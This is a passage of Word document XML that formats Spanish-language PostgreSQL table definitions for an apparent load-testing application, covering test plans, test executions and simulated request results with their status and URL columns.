          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>150</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NOT</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="003366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1995">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58647911"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1D1995">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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">descripcion </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21855DB7"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 xml:space="preserve">    usuarios_concurrentes </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</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NOT</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3366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468F579"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 xml:space="preserve">    escenario </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199DDB15"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 xml:space="preserve">    fecha_creacion </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TIMESTAMP</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DEFAULT</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CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EA69FA"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 xml:space="preserve">    id_usuario </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</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REFERENCES</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>usuario</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0823F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C19056"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p>
    <w:p w14:paraId="13CB3133"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Tabla de ejecuciones de prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B31F6"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b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CREATE</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TABLE</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>ejecucion_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1528B2AA"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30013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">id SERIAL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>PRIMARY</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KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AE6D1"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    id_plan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</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REFERENCES</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>plan_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">(id) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>ON</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DELETE</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CASCADE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55CF92" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07"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AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">fecha_inicio </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NOT</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="003366"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>DEFAULT</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CURRENT_TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4608E03E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07"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B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    fecha_fin </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TIMESTAMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8F79F2"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B52F07">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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">estado </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>50</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CHECK</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (estado </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>IN</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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF0F0"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>'En Progreso'</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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF0F0"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>'Finalizada'</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color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFF0F0"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>'Fallida'</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446276E"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 xml:space="preserve">    observaciones </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263A417"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739AED3B"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p>
    <w:p w14:paraId="198BD969"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888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>-- Tabla de resultados de solicitudes simuladas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520570E"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b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>CREATE</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TABLE</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>resultado_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B8799E"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 xml:space="preserve">    id SERIAL </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>PRIMARY</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KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E91D2"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 xml:space="preserve">    id_ejecucion </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>INT</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REFERENCES</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66BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>ejecucion_prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">(id) </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008800"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>ON</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DELETE</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CASCADE</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCDC95"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30013F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-ES" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">url </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4213">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000DD"/>
